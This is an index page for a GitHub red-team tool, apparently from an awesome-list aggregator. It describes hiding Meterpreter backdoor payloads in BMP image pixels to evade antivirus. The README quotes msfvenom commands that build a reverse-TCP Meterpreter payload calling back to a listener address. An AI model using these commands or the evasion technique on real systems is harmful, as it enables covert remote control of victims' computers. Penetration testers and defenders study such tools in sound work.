Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/DamonMohammadbagher/NativePayload_Image
Transferring Backdoor Payloads with BMP Image Pixels
https://github.com/DamonMohammadbagher/NativePayload_Image
antivirus antivirus-evasion bypass-antivirus exfiltration pentesting redteam steganography
Last synced: 3 months ago
JSON representation
Transferring Backdoor Payloads with BMP Image Pixels
- Host: GitHub
- URL: https://github.com/DamonMohammadbagher/NativePayload_Image
- Owner: DamonMohammadbagher
- Created: 2017-05-03T01:58:29.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-06-05T14:47:05.000Z (over 1 year ago)
- Last Synced: 2024-06-07T00:31:25.460Z (5 months ago)
- Topics: antivirus, antivirus-evasion, bypass-antivirus, exfiltration, pentesting, redteam, steganography
- Language: Shell
- Homepage:
- Size: 211 KB
- Stars: 79
- Watchers: 9
- Forks: 37
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - DamonMohammadbagher/NativePayload_Image - Transferring Backdoor Payloads with BMP Image Pixels (Shell)
README
# NativePayload_Image
Transferring Backdoor Payloads with BMP Image Pixels also Bypassing AVS
with this tool you can Make and Modify Bitmap files for Injecting Meterpreter payload to file also you can use this tool like backdoor for Getting Meterpreter Session by Local Bitmap Files or With Downloading Bitmap Files by Url (HTTP Traffic).for more information and using tool "NativePayload_Image.exe" Step by Step Please visit one of these links :
link: https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bmp-image-pixels-damon-mohammadbagher
, link: https://www.linkedin.com/pulse/transferring-backdoor-payloads-bmp-image-pixels-damon-mohammadbagher
C# Code : NativePayload_Image.exe , Published by Damon Mohammadbagher
/// .Net Framework 2.0 , 3.5 and 4.0 only supported
/// .Net Framework 4.5 and 4.6 Not Supported ;O
/// Windows 2008 R2 tested with BMP Format only .
/// Note : tested and worked by MS Paint for Viewing bmp files only.
/// in kali linux you can use "hexeditor" command and in windows you can use "Hex editor NEO".
/// for meterpreter payload
/// msfvenom --platfoem windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f c > payload.txt
/// msfvenom --platfoem windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt
for more information and using tool "NativePayload_Image.exe" Step by Step Please visit one of these links :
1. link: https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bmp-image-pixels-damon-mohammadbagher
2. link: https://www.linkedin.com/pulse/transferring-backdoor-payloads-bmp-image-pixels-damon-mohammadbagher